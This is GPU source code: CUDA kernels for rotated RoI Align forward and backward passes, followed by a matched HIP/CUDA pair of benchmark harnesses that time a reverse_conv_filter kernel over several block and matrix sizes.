#include <ATen/ATen.h> #include <ATen/cuda/CUDAContext.h> #include <THC/THC.h> #include <THC/THCAtomics.cuh> #include <THC/THCDeviceUtils.cuh> #include <cuda_runtime.h> #include <cstdio> #include <memory> #include "rotate_rect_ops.h" // TODO make it in a common file #define CUDA_1D_KERNEL_LOOP(i, n) \ for (int i = blockIdx.x * blockDim.x + threadIdx.x; i < n; \ i += blockDim.x * gridDim.x) #define CUDA_CHECK(call) { \ cudaError_t err; \ if ((err = (call)) != cudaSuccess) { \ fprintf(stderr, "Got error %s at %s:%d\n", cudaGetErrorString(err), \ __FILE__, __LINE__); \ exit(1); \ } \ } template <typename T> struct device_ptr_deleter { void operator()(T* ptr) { CUDA_CHECK(cudaFree(ptr)); } }; template <typename T> struct host_ptr_deleter { void operator()(T* ptr) { CUDA_CHECK(cudaFreeHost(ptr)); } }; template <typename T> using unique_ptr_device = std::unique_ptr<T[], device_ptr_deleter<T>>; template <typename T> using unique_ptr_host = std::unique_ptr<T[], host_ptr_deleter<T>>; const int TILE_DIM = 32; template <typename T> __global__ void matrix_transpose( T* __restrict__ transposed_matrix, const T* __restrict__ original_matrix, const int num_columns, const int num_rows ) { __shared__ T tile[TILE_DIM][TILE_DIM+1]; int row = blockIdx.y * TILE_DIM + threadIdx.y; int column = blockIdx.x * TILE_DIM + threadIdx.x; if (row < num_rows && column < num_columns) { tile[threadIdx.y][threadIdx.x] = original_matrix[row * num_columns + column]; } __syncthreads(); int transpose_column = blockIdx.y * TILE_DIM + threadIdx.x; int transpose_row = blockIdx.x * TILE_DIM + threadIdx.y; if (transpose_row < num_columns && transpose_column < num_rows) { transposed_matrix[transpose_row * num_rows + transpose_column] = tile[threadIdx.x][threadIdx.y]; } } template <typename T> __device__ T bilinear_interpolate(const T* bottom_data, const int height, const int width, T y, T x, const int index /* index for debug only*/) { // deal with cases that inverse elements are out of feature map boundary if (y < -1.0 || y > height || x < -1.0 || x > width) { //empty return 0; } if (y <= 0) y = 0; if (x <= 0) x = 0; int y_low = (int) y; int x_low = (int) x; int y_high; int x_high; if (y_low >= height - 1) { y_high = y_low = height - 1; y = (T) y_low; } else { y_high = y_low + 1; } if (x_low >= width - 1) { x_high = x_low = width - 1; x = (T) x_low; } else { x_high = x_low + 1; } T ly = y - y_low; T lx = x - x_low; T hy = 1. - ly, hx = 1. - lx; // do bilinear interpolation T v1 = bottom_data[y_low * width + x_low]; T v2 = bottom_data[y_low * width + x_high]; T v3 = bottom_data[y_high * width + x_low]; T v4 = bottom_data[y_high * width + x_high]; T w1 = hy * hx, w2 = hy * lx, w3 = ly * hx, w4 = ly * lx; T val = (w1 * v1 + w2 * v2 + w3 * v3 + w4 * v4); return val; } template <typename T> __device__ void bilinear_interpolate_gradient( const int height, const int width, T y, T x, T & w1, T & w2, T & w3, T & w4, int & x_low, int & x_high, int & y_low, int & y_high, const int index /* index for debug only*/) { // deal with cases that inverse elements are out of feature map boundary if (y < -1.0 || y > height || x < -1.0 || x > width) { //empty w1 = w2 = w3 = w4 = 0.; x_low = x_high = y_low = y_high = -1; return; } if (y <= 0) y = 0; if (x <= 0) x = 0; y_low = (int) y; x_low = (int) x; if (y_low >= height - 1) { y_high = y_low = height - 1; y = (T) y_low; } else { y_high = y_low + 1; } if (x_low >= width - 1) { x_high = x_low = width - 1; x = (T) x_low; } else { x_high = x_low + 1; } T ly = y - y_low; T lx = x - x_low; T hy = 1. 
- ly, hx = 1. - lx; // reference in forward // T v1 = bottom_data[y_low * width + x_low]; // T v2 = bottom_data[y_low * width + x_high]; // T v3 = bottom_data[y_high * width + x_low]; // T v4 = bottom_data[y_high * width + x_high]; // T val = (w1 * v1 + w2 * v2 + w3 * v3 + w4 * v4); w1 = hy * hx, w2 = hy * lx, w3 = ly * hx, w4 = ly * lx; return; } template <typename T> __global__ void RRoIAlignForward(const int nthreads, const T* bottom_data, const T spatial_scale, const int channels, const int height, const int width, const int pooled_height, const int pooled_width, const int sampling_ratio, const T* bottom_rois, T* top_data) { CUDA_1D_KERNEL_LOOP(index, nthreads) { // (n, c, ph, pw) is an element in the pooled output int pw = index % pooled_width; int ph = (index / pooled_width) % pooled_height; int c = (index / pooled_width / pooled_height) % channels; int n = index / pooled_width / pooled_height / channels; const T* offset_bottom_rois = bottom_rois + n * 6; // batch_ind, xc, yc, w, h, angle int roi_batch_ind = offset_bottom_rois[0]; // Force malformed ROIs to be 1x1 T roi_width = max(offset_bottom_rois[3] * spatial_scale, (T)1.); T roi_height = max(offset_bottom_rois[4] * spatial_scale, (T)1.); const T* offset_bottom_data = bottom_data + (roi_batch_ind * channels + c) * height * width; // We use roi_bin_grid to sample the grid and mimic integral int roi_bin_grid_h = (sampling_ratio > 0) ? sampling_ratio : ceil(roi_height / pooled_height); // e.g., = 2 int roi_bin_grid_w = (sampling_ratio > 0) ? sampling_ratio : ceil(roi_width / pooled_width); const T mw = 1.0 / roi_bin_grid_w; const T mh = 1.0 / roi_bin_grid_h; // compute pool points T P[8]; compute_roi_pool_pts(offset_bottom_rois, P, spatial_scale, pooled_height, pooled_width, ph, pw); // compute line params T line_params[4]; for (int i = 0; i < 2; ++i) { line_params[i * 2] = P[((i + 1) * 2) % 8] - P[i * 2]; line_params[i * 2 + 1] = P[((i + 1) * 2) % 8 + 1] - P[i * 2 + 1]; } // We do average (integral) pooling inside a bin const T count = roi_bin_grid_h * roi_bin_grid_w; // e.g. 
= 4 T output_val = 0.; for (int iy = 0; iy < roi_bin_grid_h; iy ++) // e.g., iy = 0, 1 { for (int ix = 0; ix < roi_bin_grid_w; ix ++) { const T x = P[0] + static_cast<T>(iy + 0.5) * line_params[0] * mh + static_cast<T>(ix + 0.5) * line_params[2] * mw; const T y = P[1] + static_cast<T>(iy + 0.5) * line_params[1] * mh + static_cast<T>(ix + 0.5) * line_params[3] * mw; T val = bilinear_interpolate(offset_bottom_data, height, width, y, x, index); output_val += val; // printf("%.2f\n", val); } } output_val /= count; top_data[index] = output_val; } } template <typename T> __global__ void RRoIAlignBackwardFeature(const int nthreads, const T* top_diff, const int num_rois, const T spatial_scale, const int channels, const int height, const int width, const int pooled_height, const int pooled_width, const int sampling_ratio, T* bottom_diff, const T* bottom_rois) { CUDA_1D_KERNEL_LOOP(index, nthreads) { // (n, c, ph, pw) is an element in the pooled output int pw = index % pooled_width; int ph = (index / pooled_width) % pooled_height; int c = (index / pooled_width / pooled_height) % channels; int n = index / pooled_width / pooled_height / channels; const T* offset_bottom_rois = bottom_rois + n * 6; int roi_batch_ind = offset_bottom_rois[0]; // Force malformed ROIs to be 1x1 T roi_width = max(offset_bottom_rois[3] * spatial_scale, (T)1.); T roi_height = max(offset_bottom_rois[4] * spatial_scale, (T)1.); // We use roi_bin_grid to sample the grid and mimic integral int roi_bin_grid_h = (sampling_ratio > 0) ? sampling_ratio : ceil(roi_height / pooled_height); // e.g., = 2 int roi_bin_grid_w = (sampling_ratio > 0) ? sampling_ratio : ceil(roi_width / pooled_width); const T mw = 1.0 / roi_bin_grid_w; const T mh = 1.0 / roi_bin_grid_h; T* offset_bottom_diff = bottom_diff + (roi_batch_ind * channels + c) * height * width; int top_offset = (n * channels + c) * pooled_height * pooled_width; const T* offset_top_diff = top_diff + top_offset; const T top_diff_this_bin = offset_top_diff[ph * pooled_width + pw]; // compute pool points T P[8]; compute_roi_pool_pts(offset_bottom_rois, P, spatial_scale, pooled_height, pooled_width, ph, pw); // compute line params T line_params[4]; for (int i = 0; i < 2; ++i) { line_params[i * 2] = P[((i + 1) * 2) % 8] - P[i * 2]; line_params[i * 2 + 1] = P[((i + 1) * 2) % 8 + 1] - P[i * 2 + 1]; } // We do average (integral) pooling inside a bin const T count = roi_bin_grid_h * roi_bin_grid_w; // e.g. 
= 4 for (int iy = 0; iy < roi_bin_grid_h; iy ++) // e.g., iy = 0, 1 { for (int ix = 0; ix < roi_bin_grid_w; ix ++) { const T x = P[0] + static_cast<T>(iy + 0.5) * line_params[0] * mh + static_cast<T>(ix + 0.5) * line_params[2] * mw; const T y = P[1] + static_cast<T>(iy + 0.5) * line_params[1] * mh + static_cast<T>(ix + 0.5) * line_params[3] * mw; T w1, w2, w3, w4; int x_low, x_high, y_low, y_high; bilinear_interpolate_gradient(height, width, y, x, w1, w2, w3, w4, x_low, x_high, y_low, y_high, index); T g1 = top_diff_this_bin * w1 / count; T g2 = top_diff_this_bin * w2 / count; T g3 = top_diff_this_bin * w3 / count; T g4 = top_diff_this_bin * w4 / count; if (x_low >= 0 && x_high >= 0 && y_low >= 0 && y_high >= 0) { atomicAdd(offset_bottom_diff + y_low * width + x_low, static_cast<T>(g1)); atomicAdd(offset_bottom_diff + y_low * width + x_high, static_cast<T>(g2)); atomicAdd(offset_bottom_diff + y_high * width + x_low, static_cast<T>(g3)); atomicAdd(offset_bottom_diff + y_high * width + x_high, static_cast<T>(g4)); } // if } // ix } // iy } // CUDA_1D_KERNEL_LOOP } // RoIAlignBackward at::Tensor RROIAlign_forward_cuda(const at::Tensor& input, const at::Tensor& rois, const float spatial_scale, const int pooled_height, const int pooled_width, const int sampling_ratio) { AT_ASSERTM(input.type().is_cuda(), "input must be a CUDA tensor"); AT_ASSERTM(rois.type().is_cuda(), "rois must be a CUDA tensor"); auto num_rois = rois.size(0); auto channels = input.size(1); auto height = input.size(2); auto width = input.size(3); auto output = at::empty({num_rois, channels, pooled_height, pooled_width}, input.options()); auto output_size = num_rois * pooled_height * pooled_width * channels; // auto argmax = at::zeros({num_rois, channels, pooled_height, pooled_width}, input.options().dtype(at::kInt)); cudaStream_t stream = at::cuda::getCurrentCUDAStream(); dim3 grid(std::min(THCCeilDiv((long)output_size, 512L), 4096L)); dim3 block(512); if (output.numel() == 0) { THCudaCheck(cudaGetLastError()); return output; } AT_DISPATCH_FLOATING_TYPES(input.type(), "RROIAlign_forward", [&] { RRoIAlignForward<scalar_t><<<grid, block, 0, stream>>>( output_size, input.contiguous().data<scalar_t>(), spatial_scale, channels, height, width, pooled_height, pooled_width, sampling_ratio, rois.contiguous().data<scalar_t>(), output.data<scalar_t>() ); }); THCudaCheck(cudaGetLastError()); return output; } template <typename T> __device__ void compute_transform_matrix( T* __restrict__ matrix, const T* __restrict__ rois, const float spatial_scale, const int pooled_height, const int pooled_width) { T cx = rois[1] * spatial_scale; T cy = rois[2] * spatial_scale; // Force malformed ROIs to be 1x1 T w = max(rois[3] * spatial_scale, T(1)); T h = max(rois[4] * spatial_scale, T(1)); T angle = deg2rad(rois[5]); // TransformPrepare T dx = -pooled_width / 2.0; T dy = -pooled_height / 2.0; T Sx = w / pooled_width; T Sy = h / pooled_height; T Alpha = cos(angle); T Beta = -sin(angle); T Dx = cx; T Dy = cy; matrix[0] = Alpha*Sx; matrix[1] = Beta*Sy; matrix[2] = Alpha*Sx*dx+Beta*Sy*dy+Dx; matrix[3] = -Beta*Sx; matrix[4] = Alpha*Sy; matrix[5] = -Beta*Sx*dx+Alpha*Sy*dy+Dy; } // local memory version template <typename T> __global__ void compute_roi_pool_pts_local( T* __restrict__ roi_pool_pts, const T* __restrict__ rois, const float spatial_scale, const int roi_pool_pt_num, const int num_rois, const int pooled_height, const int pooled_width) { T matrix[6]; // int idx = blockIdx.x * (blockDim.x * blockDim.y) + threadIdx.x * blockDim.y + threadIdx.y; int 
idx = blockIdx.x * (pooled_height * pooled_width) + threadIdx.x * pooled_width + threadIdx.y; if (idx >= num_rois * pooled_height * pooled_width) { return; } int pw = threadIdx.y; int ph = threadIdx.x; int n = blockIdx.x; compute_transform_matrix( matrix, rois + n*6, spatial_scale, pooled_height, pooled_width); // ORDER IN CLOCKWISE OR ANTI-CLOCKWISE // (0,1),(0,0),(1,0),(1,1) roi_pool_pts[roi_pool_pt_num * 0 + idx] = matrix[0]*pw + matrix[1]*(ph+1) + matrix[2]; roi_pool_pts[roi_pool_pt_num * 1 + idx] = matrix[3]*pw + matrix[4]*(ph+1) + matrix[5]; roi_pool_pts[roi_pool_pt_num * 2 + idx] = matrix[0]*pw + matrix[1]*ph + matrix[2]; roi_pool_pts[roi_pool_pt_num * 3 + idx] = matrix[3]*pw + matrix[4]*ph + matrix[5]; roi_pool_pts[roi_pool_pt_num * 4 + idx] = matrix[0]*(pw+1) + matrix[1]*ph + matrix[2]; roi_pool_pts[roi_pool_pt_num * 5 + idx] = matrix[3]*(pw+1) + matrix[4]*ph + matrix[5]; roi_pool_pts[roi_pool_pt_num * 6 + idx] = matrix[0]*(pw+1) + matrix[1]*(ph+1) + matrix[2]; roi_pool_pts[roi_pool_pt_num * 7 + idx] = matrix[3]*(pw+1) + matrix[4]*(ph+1) + matrix[5]; } template <typename T> __global__ void bp_rroi_align_backward_kernel( T* __restrict__ bottom_diff, const T* __restrict__ top_diff, const T* __restrict__ roi_pool_pts, const T* __restrict__ rois, const float spatial_scale, const int sampling_ratio, const int num_rois, const int batch_size, const int channels, const int height, const int width, const int pooled_height, const int pooled_width) { __shared__ T roi_pool_pts_shared[8]; __shared__ T line_params[4]; __shared__ T rois_shared[6]; const int roi_pool_pt_num = num_rois * pooled_height * pooled_width; for (int i = blockIdx.x * blockDim.x + threadIdx.x; i < roi_pool_pt_num; i += blockDim.x * gridDim.x) { int c = blockIdx.y * blockDim.y + threadIdx.y; if (c < channels) { int pw = i % pooled_width; int ph = (i / pooled_width) % pooled_height; int n = i / pooled_width / pooled_height; const T* rois_offset = rois + n * 6; // batch_ind, xc, yc, w, h, angle if (threadIdx.y < 6) { rois_shared[threadIdx.y] = rois_offset[threadIdx.y]; } int roi_pool_idx = n * pooled_height * pooled_width + ph * pooled_width + pw; int roi_pool_idx_shared = threadIdx.y; if (roi_pool_idx_shared < 8) { roi_pool_pts_shared[roi_pool_idx_shared] = roi_pool_pts[roi_pool_idx_shared * roi_pool_pt_num + roi_pool_idx]; } __syncthreads(); // compute line params // if (roi_pool_idx_shared < 4) { // line_params[roi_pool_idx_shared] = roi_pool_pts_shared[((roi_pool_idx_shared / 2) + 1) * 2 % 8 + roi_pool_idx_shared % 2] - roi_pool_pts_shared[roi_pool_idx_shared]; // } if (roi_pool_idx_shared < 2) { line_params[roi_pool_idx_shared * 2] = roi_pool_pts_shared[((roi_pool_idx_shared + 1) * 2) % 8] - roi_pool_pts_shared[roi_pool_idx_shared * 2]; line_params[roi_pool_idx_shared * 2 + 1] = roi_pool_pts_shared[((roi_pool_idx_shared + 1) * 2) % 8 + 1] - roi_pool_pts_shared[roi_pool_idx_shared * 2 + 1]; } __syncthreads(); int roi_batch_id = rois_shared[0]; // Force malformed ROIs to be 1x1 T roi_width = max(rois_shared[3] * spatial_scale, (T)1.); T roi_height = max(rois_shared[4] * spatial_scale, (T)1.); // We use roi_bin_grid to sample the grid and mimic integral int roi_bin_grid_h = (sampling_ratio > 0) ? sampling_ratio : ceil(roi_height / pooled_height); // e.g., = 2 int roi_bin_grid_w = (sampling_ratio > 0) ? 
sampling_ratio : ceil(roi_width / pooled_width);
      const T mw = 1.0 / roi_bin_grid_w;
      const T mh = 1.0 / roi_bin_grid_h;

      int top_data_idx = (n * channels + c) * pooled_width * pooled_height + ph * pooled_width + pw;
      const T top_diff_this_bin = top_diff[top_data_idx];

      // We do average (integral) pooling inside a bin
      const T count = roi_bin_grid_h * roi_bin_grid_w;

      for (int iy = 0; iy < roi_bin_grid_h; iy++) {
        for (int ix = 0; ix < roi_bin_grid_w; ix++) {
          const T x = roi_pool_pts_shared[0]
                      + static_cast<T>(iy + 0.5) * line_params[0] * mh
                      + static_cast<T>(ix + 0.5) * line_params[2] * mw;
          const T y = roi_pool_pts_shared[1]
                      + static_cast<T>(iy + 0.5) * line_params[1] * mh
                      + static_cast<T>(ix + 0.5) * line_params[3] * mw;

          T w1, w2, w3, w4;
          int x_low, x_high, y_low, y_high;
          bilinear_interpolate_gradient(height, width, y, x,
                                        w1, w2, w3, w4,
                                        x_low, x_high, y_low, y_high, 0);

          T g1 = top_diff_this_bin * w1 / count;
          T g2 = top_diff_this_bin * w2 / count;
          T g3 = top_diff_this_bin * w3 / count;
          T g4 = top_diff_this_bin * w4 / count;

          if (x_low >= 0 && x_high >= 0 && y_low >= 0 && y_high >= 0) {
            atomicAdd(bottom_diff + ((y_low  * width + x_low ) * batch_size + roi_batch_id) * channels + c, static_cast<T>(g1));
            atomicAdd(bottom_diff + ((y_low  * width + x_high) * batch_size + roi_batch_id) * channels + c, static_cast<T>(g2));
            atomicAdd(bottom_diff + ((y_high * width + x_low ) * batch_size + roi_batch_id) * channels + c, static_cast<T>(g3));
            atomicAdd(bottom_diff + ((y_high * width + x_high) * batch_size + roi_batch_id) * channels + c, static_cast<T>(g4));
          }
        }
      }
    }
  }
}

void bp_rroi_align_backward(
    int batch_size,
    int num_rois,
    int channels,
    int height,
    int width,
    int pooled_height,
    int pooled_width,
    float spatial_scale,
    const float* top_diff_d,
    const float* rois_d,
    float* bottom_diff_d,
    cudaStream_t stream) {
  unique_ptr_device<float> roi_pool_pts_d(nullptr);
  int roi_pool_pt_num = num_rois * pooled_height * pooled_width;
  CUDA_CHECK(cudaMalloc((void **) &roi_pool_pts_d, 8 * roi_pool_pt_num * sizeof(float)));

  unique_ptr_device<float> bottom_diff_coalesced_d(nullptr);
  auto bottom_data_size = batch_size * channels * height * width;
  CUDA_CHECK(cudaMalloc((void **) &bottom_diff_coalesced_d, bottom_data_size * sizeof(float)));

  {
    int block_x = TILE_DIM;
    int block_y = TILE_DIM;
    const int num_columns = height * width;
    const int num_rows = batch_size * channels;
    int grid_x = static_cast<int>(std::ceil(num_columns * 1.0 / block_x));
    int grid_y = static_cast<int>(std::ceil(num_rows * 1.0 / block_y));
    dim3 block(block_x, block_y);
    dim3 grid(grid_x, grid_y);
    matrix_transpose<float><<<grid, block, 0, stream>>>(
        bottom_diff_coalesced_d.get(), bottom_diff_d, num_columns, num_rows);
  }

  {
    dim3 block(pooled_height, pooled_width);
    dim3 grid(num_rois);
    compute_roi_pool_pts_local<float><<<grid, block, 0, stream>>>(
        roi_pool_pts_d.get(), rois_d, spatial_scale, roi_pool_pt_num,
        num_rois, pooled_height, pooled_width);
  }
  CUDA_CHECK(cudaDeviceSynchronize());

  {
    // cudaDeviceProp deviceProperties;
    // int gpu_id = 0;
    // CUDA_CHECK(cudaGetDeviceProperties(&deviceProperties, gpu_id));
    int max_thread_num = 256;
    // int thread_num_x = std::min(max_thread_num / 8, pooled_width);
    // int thread_num_y = std::min(max_thread_num / thread_num_x, channels);
    int thread_num_y = std::min(channels, max_thread_num);
    // int thread_num_x = max_thread_num / thread_num_y;
    int thread_num_x = 1;
    // int block_num_x = std::min(static_cast<int>(std::ceil(pooled_width * pooled_height * num_rois * 1.0 / thread_num_x)), deviceProperties.maxGridSize[0]);
    int block_num_x = std::min(static_cast<int>(std::ceil(pooled_width * pooled_height * num_rois * 1.0 / thread_num_x)), 65535);
    int block_num_y = static_cast<int>(std::ceil(channels * 1.0 / thread_num_y));
    dim3 block(thread_num_x, thread_num_y);
    dim3 grid(block_num_x, block_num_y);
    int sampling_ratio = 0;  // default
    bp_rroi_align_backward_kernel<float><<<grid, block, 0, stream>>>(
        bottom_diff_coalesced_d.get(),
        top_diff_d,
        roi_pool_pts_d.get(),
        rois_d,
        spatial_scale,
        sampling_ratio,
        num_rois,
        batch_size,
        channels,
        height,
        width,
        pooled_height,
        pooled_width);
  }
  CUDA_CHECK(cudaDeviceSynchronize());

  {
    int block_x = TILE_DIM;
    int block_y = TILE_DIM;
    const int num_columns = batch_size * channels;
    const int num_rows = height * width;
    int grid_x = static_cast<int>(std::ceil(num_columns * 1.0 / block_x));
    int grid_y = static_cast<int>(std::ceil(num_rows * 1.0 / block_y));
    dim3 block(block_x, block_y);
    dim3 grid(grid_x, grid_y);
    matrix_transpose<float><<<grid, block, 0, stream>>>(
        bottom_diff_d, bottom_diff_coalesced_d.get(), num_columns, num_rows);
  }
}

at::Tensor RROIAlign_backward_cuda(const at::Tensor& grad,
                                   const at::Tensor& rois,
                                   const float spatial_scale,
                                   const int pooled_height,
                                   const int pooled_width,
                                   const int batch_size,
                                   const int channels,
                                   const int height,
                                   const int width,
                                   const int sampling_ratio) {
  AT_ASSERTM(grad.type().is_cuda(), "grad must be a CUDA tensor");
  AT_ASSERTM(rois.type().is_cuda(), "rois must be a CUDA tensor");

  auto num_rois = rois.size(0);
  auto grad_input = at::zeros({batch_size, channels, height, width}, grad.options());

  cudaStream_t stream = at::cuda::getCurrentCUDAStream();

  dim3 grid(std::min(THCCeilDiv((long)grad.numel(), 512L), 4096L));
  dim3 block(512);

  // handle possibly empty gradients
  if (grad.numel() == 0) {
    THCudaCheck(cudaGetLastError());
    return grad_input;
  }

  AT_DISPATCH_FLOATING_TYPES(grad.type(), "RROIAlign_backward", [&] {
    // bp_rroi_align_backward(
    //     batch_size,
    //     num_rois,
    //     channels,
    //     height,
    //     width,
    //     pooled_height,
    //     pooled_width,
    //     spatial_scale,
    //     grad.contiguous().data<float>(),
    //     rois.contiguous().data<float>(),
    //     grad_input.data<float>(),
    //     stream);
    RRoIAlignBackwardFeature<scalar_t><<<grid, block, 0, stream>>>(
        grad.numel(),
        grad.contiguous().data<scalar_t>(),
        num_rois,
        spatial_scale,
        channels,
        height,
        width,
        pooled_height,
        pooled_width,
        sampling_ratio,
        grad_input.data<scalar_t>(),
        rois.contiguous().data<scalar_t>());
  });
  THCudaCheck(cudaGetLastError());
  return grad_input;
}
2c1a43ae6e7b7b4cfbf7e6558362a85e29717ae3.hip
// !!! This is a file automatically generated by hipify!!!
#include <stdbool.h>
#include <stdio.h>
#include <string.h>
#include <getopt.h>
#include <hiprand/hiprand_kernel.h>
#include <stdlib.h>
#include <hip/hip_runtime.h>
#include <sys/time.h>
#include "reverse_conv_filter.cu"
#include <chrono>
#include <iostream>
using namespace std;
using namespace std::chrono;

// candidate thread-block shapes and matrix sizes to sweep
int blocks_[20][2] = {{8,8},{16,16},{24,24},{32,32},{1,64},{1,128},{1,192},{1,256},{1,320},{1,384},{1,448},{1,512},{1,576},{1,640},{1,704},{1,768},{1,832},{1,896},{1,960},{1,1024}};
int matrices_[7][2] = {{240,240},{496,496},{784,784},{1016,1016},{1232,1232},{1680,1680},{2024,2024}};

int main(int argc, char **argv) {
    hipSetDevice(0);
    char *p;
    int matrix_len = strtol(argv[1], &p, 10);
    for (int matrix_looper = 0; matrix_looper < matrix_len; matrix_looper++) {
        for (int block_looper = 0; block_looper < 20; block_looper++) {
            int XSIZE = matrices_[matrix_looper][0], YSIZE = matrices_[matrix_looper][1];
            int BLOCKX = blocks_[block_looper][0], BLOCKY = blocks_[block_looper][1];
            // device buffers for the kernel's input and output (XSIZE*YSIZE floats each)
            const float *x = NULL;
            hipMalloc(&x, XSIZE * YSIZE * sizeof(float));
            float beta = 2;
            float *y = NULL;
            hipMalloc(&y, XSIZE * YSIZE * sizeof(float));
            unsigned int filter_len = 1;
            unsigned int len = 1;
            // round the launch extents up to a multiple of the block shape
            int iXSIZE = XSIZE;
            int iYSIZE = YSIZE;
            while (iXSIZE % BLOCKX != 0) { iXSIZE++; }
            while (iYSIZE % BLOCKY != 0) { iYSIZE++; }
            dim3 gridBlock(iXSIZE / BLOCKX, iYSIZE / BLOCKY);
            dim3 threadBlock(BLOCKX, BLOCKY);
            hipFree(0);
            // warm-up launches before timing
            hipLaunchKernelGGL(reverse_conv_filter, dim3(gridBlock), dim3(threadBlock), 0, 0, x, beta, y, filter_len, len);
            hipDeviceSynchronize();
            for (int loop_counter = 0; loop_counter < 10; ++loop_counter) {
                hipLaunchKernelGGL(reverse_conv_filter, dim3(gridBlock), dim3(threadBlock), 0, 0, x, beta, y, filter_len, len);
            }
            // time 1000 launches of the kernel for this configuration
            auto start = steady_clock::now();
            for (int loop_counter = 0; loop_counter < 1000; loop_counter++) {
                hipLaunchKernelGGL(reverse_conv_filter, dim3(gridBlock), dim3(threadBlock), 0, 0, x, beta, y, filter_len, len);
            }
            auto end = steady_clock::now();
            auto usecs = duration_cast<duration<float, microseconds::period> >(end - start);
            cout << '[' << usecs.count() << ',' << '(' << BLOCKX << ',' << BLOCKY << ')' << ',' << '(' << XSIZE << ',' << YSIZE << ')' << ']' << endl;
        }
    }
}
2c1a43ae6e7b7b4cfbf7e6558362a85e29717ae3.cu
#include <stdbool.h>
#include <stdio.h>
#include <string.h>
#include <getopt.h>
#include <curand_kernel.h>
#include <stdlib.h>
#include <cuda.h>
#include <sys/time.h>
#include "reverse_conv_filter.cu"
#include <chrono>
#include <iostream>
using namespace std;
using namespace std::chrono;

// candidate thread-block shapes and matrix sizes to sweep
int blocks_[20][2] = {{8,8},{16,16},{24,24},{32,32},{1,64},{1,128},{1,192},{1,256},{1,320},{1,384},{1,448},{1,512},{1,576},{1,640},{1,704},{1,768},{1,832},{1,896},{1,960},{1,1024}};
int matrices_[7][2] = {{240,240},{496,496},{784,784},{1016,1016},{1232,1232},{1680,1680},{2024,2024}};

int main(int argc, char **argv) {
    cudaSetDevice(0);
    char *p;
    int matrix_len = strtol(argv[1], &p, 10);
    for (int matrix_looper = 0; matrix_looper < matrix_len; matrix_looper++) {
        for (int block_looper = 0; block_looper < 20; block_looper++) {
            int XSIZE = matrices_[matrix_looper][0], YSIZE = matrices_[matrix_looper][1];
            int BLOCKX = blocks_[block_looper][0], BLOCKY = blocks_[block_looper][1];
            // device buffers for the kernel's input and output (XSIZE*YSIZE floats each)
            const float *x = NULL;
            cudaMalloc(&x, XSIZE * YSIZE * sizeof(float));
            float beta = 2;
            float *y = NULL;
            cudaMalloc(&y, XSIZE * YSIZE * sizeof(float));
            unsigned int filter_len = 1;
            unsigned int len = 1;
            // round the launch extents up to a multiple of the block shape
            int iXSIZE = XSIZE;
            int iYSIZE = YSIZE;
            while (iXSIZE % BLOCKX != 0) { iXSIZE++; }
            while (iYSIZE % BLOCKY != 0) { iYSIZE++; }
            dim3 gridBlock(iXSIZE / BLOCKX, iYSIZE / BLOCKY);
            dim3 threadBlock(BLOCKX, BLOCKY);
            cudaFree(0);
            // warm-up launches before timing
            reverse_conv_filter<<<gridBlock, threadBlock>>>(x, beta, y, filter_len, len);
            cudaDeviceSynchronize();
            for (int loop_counter = 0; loop_counter < 10; ++loop_counter) {
                reverse_conv_filter<<<gridBlock, threadBlock>>>(x, beta, y, filter_len, len);
            }
            // time 1000 launches of the kernel for this configuration
            auto start = steady_clock::now();
            for (int loop_counter = 0; loop_counter < 1000; loop_counter++) {
                reverse_conv_filter<<<gridBlock, threadBlock>>>(x, beta, y, filter_len, len);
            }
            auto end = steady_clock::now();
            auto usecs = duration_cast<duration<float, microseconds::period> >(end - start);
            cout << '[' << usecs.count() << ',' << '(' << BLOCKX << ',' << BLOCKY << ')' << ',' << '(' << XSIZE << ',' << YSIZE << ')' << ']' << endl;
        }
    }
}